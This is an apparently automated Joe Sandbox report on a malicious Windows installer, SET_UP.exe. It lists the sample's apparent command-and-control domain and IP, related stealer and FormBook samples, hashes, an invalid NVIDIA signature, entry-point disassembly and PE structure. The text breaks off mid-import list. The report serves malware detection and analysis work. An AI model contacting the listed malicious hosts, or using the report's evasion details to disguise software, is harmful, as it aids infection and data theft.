https://glowscarrytsv.sbs/ | SET_UP.exe, 00000000.00000003.1766192279.00000000009F8000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1792533320.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.1906733986.0000000000A71000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1793505529.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1793064459.00000000036BB000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1805838052.00000000036C8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1805928327.0000000000A84000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1903390472.0000000000A84000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1903390472.0000000000A71000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1792493921.00000000036BB000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1782179637.00000000036B6000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766192279.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1806395718.00000000036C8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1821548678.0000000000A84000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.1906733986.0000000000A84000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.starfieldtech.com/repository/sfsroot.crl0P | SET_UP.exe | false | | high
https://support.mozilla.org/products/firefoxgro.all | SET_UP.exe, 00000000.00000003.1794212261.00000000037D2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.micro8 | SET_UP.exe, 00000000.00000003.1766192279.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | SET_UP.exe, 00000000.00000003.1766940665.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766846038.00000000036FB000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ocsp.thawte.com0 | SET_UP.exe | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | SET_UP.exe, 00000000.00000003.1766940665.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766846038.00000000036FB000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | SET_UP.exe, 00000000.00000003.1793319091.00000000036F8000.00000004.00000800.00020000.00000000.sdmp | false | |
                                                                      high
                                                                      http://ocsp.rootca1.amazontrust.com0:SET_UP.exe, 00000000.00000003.1793319091.00000000036F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016SET_UP.exe, 00000000.00000003.1767636057.0000000003707000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1767534628.0000000003707000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1782141023.0000000003707000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1767425776.0000000003753000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://certificates.starfieldtech.com/repository/1604SET_UP.exefalse
                                                                            high
                                                                            https://www.ecosia.org/newtab/SET_UP.exe, 00000000.00000003.1766940665.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766846038.00000000036FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.symauth.com/cps0(SET_UP.exefalse
                                                                                high
                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSET_UP.exe, 00000000.00000003.1794212261.00000000037D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://ac.ecosia.org/autocomplete?q=SET_UP.exe, 00000000.00000003.1766940665.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766846038.00000000036FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://glowscarrytsv.sbs/api9SET_UP.exe, 00000000.00000003.1903390472.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://crl.starfieldtech.com/repository/0SET_UP.exefalse
                                                                                      high
                                                                                      https://glowscarrytsv.sbs/api7SET_UP.exe, 00000000.00000003.1766192279.0000000000A1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://www.symauth.com/rpa00SET_UP.exefalse
                                                                                        high
                                                                                        https://glowscarrytsv.sbs/BSET_UP.exe, 00000000.00000003.1903390472.0000000000A84000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.1906733986.0000000000A84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://support.microsofSET_UP.exe, 00000000.00000003.1767425776.0000000003755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://crt.rootca1.amazontrust.com/rootca1.cer0?SET_UP.exe, 00000000.00000003.1793319091.00000000036F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesSET_UP.exe, 00000000.00000003.1767534628.00000000036E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=SET_UP.exe, 00000000.00000003.1766940665.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766846038.00000000036FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.97.3 | glowscarrytsv.sbs | European Union | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1584813
Start date and time: 2025-01-06 15:14:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 25s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SET_UP.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@2/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 6
• Number of non-executed functions: 115
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 4.175.87.197, 20.3.187.198, 20.109.210.53, 4.245.163.56
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
09:15:08 | API Interceptor | 8x Sleep call for process: SET_UP.exe modified
Match: 188.114.97.3
Associated Sample Name / URL | Detection | Threat Name | Context
Gg6wivFINd.exe | malicious | DCRat, PureLog Stealer, zgRAT | unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
Payment Receipt.exe | malicious | FormBook | www.cifasnc.info/8rr3/
dGhlYXB0Z3JvdXA=-free.exe | malicious | Unknown | /api/get/free
dGhlYXB0Z3JvdXA=-free.exe | malicious | Unknown | /api/get/free
RFQ 3100185 MAHAD.exe | malicious | FormBook | www.rgenerousrs.store/o362/
A2028041200SD.exe | malicious | FormBook | www.beylikduzu616161.xyz/2nga/
Delivery_Notification_00000260791.doc.js | malicious | Unknown | radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
ce.vbs | malicious | Unknown | paste.ee/d/lxvbq
Label_00000852555.doc.js | malicious | Unknown | tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
PO 20495088.exe | malicious | FormBook | www.ssrnoremt-rise.sbs/3jsc/
No context
Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context
http://jennadewanunwrapped.net | malicious | Unknown | 188.114.97.3
http://103-198-26-128.hinet-ip.hinet.net/wp/plugins/Tracking/click/php/SuperTracking.html#UUJWakY1bVdkWlZQejIwbVl3cDFHb2haOENXZVhYZlpLTUNSU2x1eEVCdGJtbVhKT0ZWNkVTNjlQSXJDLzI3ekErVVlzTkFZbkh5T29jeG1LcWM4YkJUekd2M2h4amIxRWZ4am4va3cvOVk9 | malicious | Unknown | 172.66.0.145
Profile Illustrations and Technical Specifications for This System1.html | malicious | HTMLPhisher | 104.21.80.1
fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.96.3
anrek.mp4.hta | malicious | LummaC Stealer | 188.114.96.3
title.mp4.hta | malicious | LummaC, PureLog Stealer, zgRAT | 172.67.208.58
http://www.housepricesintheuk.co.uk | malicious | Unknown | 172.64.155.119
APLICATIVO-WINDOWS-NOTA-FISCAL.msi | malicious | AteraAgent | 104.18.18.106
https://pwv95gp5r-xn--r3h9jdud-xn----c1a2cj-xn----p1ai.translate.goog/sIQKSvTC/b8KvU/uoTt6?ZFhObGNpNXBiblp2YkhabGJXVnVkRUJ6YjNWMGFHVnliblJ5ZFhOMExtaHpZMjVwTG01bGRBPT06c1JsOUE+&_x_tr_sch=http&_x_tr_sl=hrLWHGLm&_x_tr_tl=bTtllyql | malicious | HTMLPhisher | 104.17.25.14
Agent381.msi | malicious | Unknown | 188.114.96.3
Match: a0e9f5d64349fb13191bc781f81f42e1
Associated Sample Name / URL | Detection | Threat Name | Context
anrek.mp4.hta | malicious | LummaC Stealer | 188.114.97.3
title.mp4.hta | malicious | LummaC, PureLog Stealer, zgRAT | 188.114.97.3
Setup.exe | malicious | LummaC | 188.114.97.3
PI ITS15235.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.97.3
un30brGAKP.exe | malicious | LummaC | 188.114.97.3
Patcher_I5cxa9AN.exe | malicious | LummaC | 188.114.97.3
DansMinistrie.exe | malicious | LummaC | 188.114.97.3
CrosshairX.exe | malicious | LummaC | 188.114.97.3
installer_1.05_36.7.exe | malicious | LummaC Stealer | 188.114.97.3
No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 0.7966240961351646
TrID:
• Win32 Executable (generic) a (10002005/4) 98.88%
• Inno Setup installer (109748/4) 1.08%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: SET_UP.exe
File size: 77'268'426 bytes
MD5: 5b0bafdddbc54bcbc57b87dfb94d0c64
SHA1: 80f9e34f49784e7d097ea9cdf3989133a688c726
SHA256: cedea9aa30ea6ae6d36937321225d8ad2d8e2ff21412ef2254817b0da028ed71
SHA512: 31904c1b0f616fb1fccd5d293eb5df41a03db998cfe29d34ef88fedd175d6fcaf5d6b4b30219d0c8c8b96b4a2b3c7a9da95ad023a52eaaec2f0209c77ffcc9d9
SSDEEP: 49152:YLJwSihjgb6GLb4SKEs3DyOMC2DlUt0+yO3A32ASNTv0k7Ox1jWV9D:0wSiab67zeCzt0+yO3kSeuOr45
TLSH: F408B22DBF04396DCF0E29B5659383ECD826DF113B1188FF1694B568BA312DC86BA50D
File Content Preview: MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
Icon Hash: 0427315d6d330600
Entrypoint: 0x6c3650
Entrypoint Section: .itext
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics: NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x5FB0F970 [Sun Nov 15 09:48:32 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 1
File Version Major: 6
File Version Minor: 1
Subsystem Version Major: 6
Subsystem Version Minor: 1
Import Hash: 7c77b89cd344508d2ca812dd1c349c70
Signature Valid: false
Signature Issuer: CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232
Not Before: 27/07/2015 20:00:00
Not After: 26/07/2018 19:59:59
Subject Chain: CN=NVIDIA Corporation, O=NVIDIA Corporation, L=SANTA CLARA, S=California, C=US
Version: 3
Thumbprint MD5: F7219078FBE20BC1B98BF8A86BFC0396
Thumbprint SHA-1: 30632EA310114105969D0BDA28FDCE267104754F
Thumbprint SHA-256: 1B5061CF61C93822BDE2433156EEBE1F027C8FA9C88A4AF0EBD1348AF79C61E2
Serial: 14781BC862E8DC503A559346F5DCC518
Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
push ebx
push esi
push edi
mov eax, 006B8354h
call 00007FBD90853A8Ah
mov eax, dword ptr [006CCEACh]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+00000188h]
push FFFFFFECh
push eax
call 00007FBD90857E05h
mov edx, dword ptr [006CCEACh]
mov edx, dword ptr [edx]
mov edx, dword ptr [edx+00000188h]
and eax, FFFFFF7Fh
push eax
push FFFFFFECh
push edx
call 00007FBD90857DF1h
xor eax, eax
push ebp
push 006C36D4h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
push 00000001h
call 00007FBD90857154h
call 00007FBD90AFAF53h
mov eax, dword ptr [006B7F7Ch]
push eax
push 006B8014h
mov eax, dword ptr [006CCEACh]
mov eax, dword ptr [eax]
call 00007FBD909FB5C0h
call 00007FBD90AFAFA7h
xor eax, eax
pop edx
pop ecx
pop ecx
mov dword ptr fs:[eax], edx
jmp 00007FBD90B0655Bh
jmp 00007FBD9084C39Ch
call 00007FBD90AFACEFh
mov eax, 00000001h
call 00007FBD9084CE85h
call 00007FBD9084C7E0h
mov eax, dword ptr [006CCEACh]
mov eax, dword ptr [eax]
mov edx, 006C3868h
call 00007FBD909FB097h
push 00000005h
mov eax, dword ptr [006CCEACh]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+00000188h]
push eax
call 00007FBD90857B1Ah
mov eax, dword ptr [006CCEACh]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x2db000 | 0x97 | .edata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2d6000 | 0x3934 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2de000 | 0xbea00 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x49acc0a | 0x39c0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x2dd000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2d69e4 | 0x8b8 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x2da000 | 0xbde | .didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2bf850 | 0x2bfa00 | 94768d0e79cacab8f82f6b8ab2b7b8e0 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x2c1000 | 0x2874 | 0x2a00 | a8ea4b7956e1b51171165830d3ce6a78 | False | 0.5008370535714286 | data | 6.108103601351959 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x2c4000 | 0x91c8 | 0x9200 | 586ad30a8215d7030e5320e27bce3ca4 | False | 0.5825128424657534 | data | 6.266972371639043 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x2ce000 | 0x78dc | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x2d6000 | 0x3934 | 0x3a00 | 9a10d495545bbe0d0c173e5160012f77 | False | 0.33189655172413796 | data | 5.193230529657497 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata | 0x2da000 | 0xbde | 0xc00 | 2937589ef8b41cb66bf6ca8aa8fcd7af | False | 0.349609375 | data | 4.403135759875134 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata | 0x2db000 | 0x97 | 0x200 | 1fa460bfb714a17109f4d1b931b695e1 | False | 0.25 | data | 1.855121367761671 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls | 0x2dc000 | 0x4c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x2dd000 | 0x5d | 0x200 | ab111d8950af4c4fa175bda002954fdb | False | 0.189453125 | data | 1.3651255461701644 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x2de000 | 0xbea00 | 0xbea00 | 4e36fd7c06cb7b9a5ab7e23518c8e5ef | False | 0.36351434426229506 | data | 5.495461641285404 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x2ded68 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0x2dee9c | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0x2defd0 | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0x2df104 | 0x134 | data | English | United States | 0.38311688311688313
RT_CURSOR | 0x2df238 | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0x2df36c | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0x2df4a0 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_BITMAP | 0x2df5d4 | 0xd28 | Device independent bitmap graphic, 48 x 48 x 8, image size 0, resolution 3780 x 3780 px/m, 256 important colors | | | 0.16508313539192399
RT_BITMAP | 0x2e02fc | 0x32a | Device independent bitmap graphic, 16 x 16 x 24, image size 770, resolution 3779 x 3779 px/m | | | 0.2074074074074074
RT_ICON | 0x2e0628 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 270336 | English | United States | 0.06961416693789389
RT_ICON | 0x322650 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | English | United States | 0.04637406837809062
RT_ICON | 0x332e78 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.1620217288615966
RT_ICON | 0x3370a0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.24564315352697094
RT_ICON | 0x339648 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.3067542213883677
RT_ICON | 0x33a6f0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.5044326241134752
RT_STRING | 0x33ab58 | 0x210 | data | | | 0.3125
RT_STRING | 0x33ad68 | 0x440 | data | | | 0.37683823529411764
RT_STRING | 0x33b1a8 | 0x2b4 | data | | | 0.45809248554913296
RT_STRING | 0x33b45c | 0x214 | data | | | 0.4605263157894737
RT_STRING | 0x33b670 | 0x3e4 | data | | | 0.3885542168674699
RT_STRING | 0x33ba54 | 0x3a0 | data | | | 0.4191810344827586
RT_STRING | 0x33bdf4 | 0x1ec | data | | | 0.5609756097560976
RT_STRING | 0x33bfe0 | 0xcc | data | | | 0.6666666666666666
RT_STRING | 0x33c0ac | 0x294 | data | | | 0.4681818181818182
RT_STRING | 0x33c340 | 0x3e8 | data | | | 0.372
RT_STRING | 0x33c728 | 0x488 | data | | | 0.41293103448275864
RT_STRING | 0x33cbb0 | 0x418 | data | | | 0.28435114503816794
RT_STRING | 0x33cfc8 | 0x370 | data | | | 0.4147727272727273
RT_STRING | 0x33d338 | 0x39c | data | | | 0.41233766233766234
RT_STRING | 0x33d6d4 | 0x4a4 | data | | | 0.382996632996633
RT_STRING | 0x33db78 | 0x384 | data | | | 0.37333333333333335
RT_STRING | 0x33defc | 0x454 | data | | | 0.3935018050541516
RT_STRING | 0x33e350 | 0x210 | data | | | 0.39015151515151514
RT_STRING | 0x33e560 | 0xbc | data | | | 0.6542553191489362
RT_STRING | 0x33e61c | 0x100 | data | | | 0.62890625
RT_STRING | 0x33e71c | 0x338 | data | | | 0.4223300970873786
RT_STRING | 0x33ea54 | 0x3f0 | data | | | 0.34226190476190477
RT_STRING | 0x33ee44 | 0x314 | data | | | 0.38578680203045684
RT_STRING | 0x33f158 | 0x2f8 | data | | | 0.38026315789473686
RT_RCDATA | 0x33f450 | 0x10 | data | | | 1.5
RT_RCDATA | 0x33f460 | 0x1800 | PE32+ executable (console) x86-64, for MS Windows | English | United States | 0.3924153645833333
RT_RCDATA | 0x340c60 | 0xb6c | data | | | 0.5355677154582763
RT_RCDATA | 0x3417cc | 0x147 | Delphi compiled form 'TMainForm' | | | 0.746177370030581
RT_RCDATA | 0x341914 | 0x480 | Delphi compiled form 'TNewDiskForm' | | | 0.5034722222222222
RT_RCDATA | 0x341d94 | 0x400 | Delphi compiled form 'TSelectFolderForm' | | | 0.5087890625
RT_RCDATA | 0x342194 | 0x4b5 | Delphi compiled form 'TSelectLanguageForm' | | | 0.5004149377593361
RT_RCDATA | 0x34264c | 0x7ff | Delphi compiled form 'TUninstallProgressForm' | | | 0.4054714215925745
RT_RCDATA | 0x342e4c | 0x55c | Delphi compiled form 'TUninstSharedFileForm' | | | 0.41690962099125367
RT_RCDATA | 0x3433a8 | 0x2ac9 | Delphi compiled form 'TWizardForm' | | | 0.19811923673879303
RT_GROUP_CURSOR | 0x345e74 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x345e88 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x345e9c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x345eb0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x345ec4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x345ed8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x345eec | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_ICON | 0x345f00 | 0x5a | data | English | United States | 0.7666666666666667
RT_VERSION | 0x345f5c | 0x514 | data | English | United States | 0.2923076923076923
RT_MANIFEST | 0x346470 | 0x726 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.4005464480874317
DLL | Import
mpr.dll | WNetEnumResourceW, WNetGetUniversalNameW, WNetGetConnectionW, WNetCloseEnum, WNetOpenEnumW
comdlg32.dll | GetSaveFileNameW, GetOpenFileNameW
comctl32.dll | FlatSB_SetScrollInfo, InitCommonControls, ImageList_DragMove, ImageList_Destroy, _TrackMouseEvent, ImageList_DragShowNolock, ImageList_Add, FlatSB_SetScrollProp, ImageList_GetDragImage, ImageList_Create, ImageList_EndDrag, ImageList_DrawEx, ImageList_SetImageCount, FlatSB_GetScrollPos, FlatSB_SetScrollPos, InitializeFlatSB, FlatSB_GetScrollInfo, ImageList_Write, ImageList_SetBkColor, ImageList_GetBkColor, ImageList_BeginDrag, ImageList_GetIcon, ImageList_GetImageCount, ImageList_DragEnter, ImageList_GetIconSize, ImageList_SetIconSize, ImageList_Read, ImageList_DragLeave, ImageList_Draw, ImageList_Remove
shell32.dll | SHBrowseForFolderW, ExtractIconW, SHGetMalloc, SHGetFileInfoW, SHChangeNotify, Shell_NotifyIconW, ShellExecuteW, SHGetPathFromIDListW, ShellExecuteExW
user32.dll | CopyImage, CreateWindowExW, GetMenuItemInfoW, SetMenuItemInfoW, DefFrameProcW, GetDCEx, GetMessageW, PeekMessageW, MonitorFromWindow, GetDlgCtrlID, ScrollWindowEx, SetTimer, WindowFromPoint, BeginPaint, RegisterClipboardFormatW, FrameRect, MapVirtualKeyW, OffsetRect, IsWindowUnicode, RegisterWindowMessageW, FillRect, GetMenuStringW, DispatchMessageW, SendMessageA, DefMDIChildProcW, EnumWindows, GetClassInfoW, GetSystemMenu, WaitForInputIdle, ShowOwnedPopups, GetScrollRange, GetScrollPos, SetScrollPos, GetActiveWindow, SetActiveWindow, DrawEdge, InflateRect, GetKeyboardLayoutList, OemToCharBuffA, LoadBitmapW, DrawFocusRect, EnumChildWindows, GetScrollBarInfo, SendNotifyMessageW, ReleaseCapture, UnhookWindowsHookEx, LoadCursorW, GetCapture, SetCapture, CreatePopupMenu, ScrollWindow, ShowCaret, GetMenuItemID, GetLastActivePopup, CharLowerBuffW, GetSystemMetrics, SetWindowLongW, PostMessageW, DrawMenuBar, SetParent, IsZoomed, CharUpperBuffW, GetClientRect, IsChild, ClientToScreen, SetWindowPlacement, IsIconic, CallNextHookEx, GetMonitorInfoW, ShowWindow, CheckMenuItem, CharUpperW, DefWindowProcW, GetForegroundWindow, SetForegroundWindow, GetWindowTextW, EnableWindow, DestroyWindow, IsDialogMessageW, EndMenu, RegisterClassW, CharNextW, GetWindowThreadProcessId, RedrawWindow, GetDC, GetFocus, SetFocus, EndPaint, ExitWindowsEx, ReleaseDC, MsgWaitForMultipleObjectsEx, LoadKeyboardLayoutW, GetClassLongW, ActivateKeyboardLayout, GetParent, CharToOemBuffA, DrawTextW, SetScrollRange, InsertMenuItemW, PeekMessageA, GetPropW, SetClassLongW, MessageBoxW, MessageBeep, SetPropW, SetRectEmpty, UpdateWindow, RemovePropW, GetSubMenu, MsgWaitForMultipleObjects, DestroyMenu, DestroyIcon, SetWindowsHookExW, IsWindowVisible, DispatchMessageA, UnregisterClassW, GetTopWindow, SendMessageW, AdjustWindowRectEx, DrawIcon, IsWindow, EnumThreadWindows, InvalidateRect, GetKeyboardState, DrawFrameControl, ScreenToClient, SendMessageTimeoutW, BringWindowToTop, SetCursor, CreateIcon, CreateMenu, LoadStringW, CharLowerW, SetWindowPos, SetWindowRgn, GetMenuItemCount, RemoveMenu, AppendMenuW, GetSysColorBrush, GetKeyboardLayoutNameW, GetWindowDC, TranslateMessage, DrawTextExW, MapWindowPoints, EnumDisplayMonitors, CallWindowProcW, DestroyCursor, ReplyMessage, GetScrollInfo, SetWindowTextW, GetMessageExtraInfo, EnableScrollBar, GetSysColor, TrackPopupMenu, DrawIconEx, PostQuitMessage, GetClassNameW, ShowScrollBar, EnableMenuItem, GetIconInfo, GetMessagePos, SetScrollInfo, GetKeyNameTextW, GetDesktopWindow, GetCursorPos, SetCursorPos, HideCaret, GetMenu, 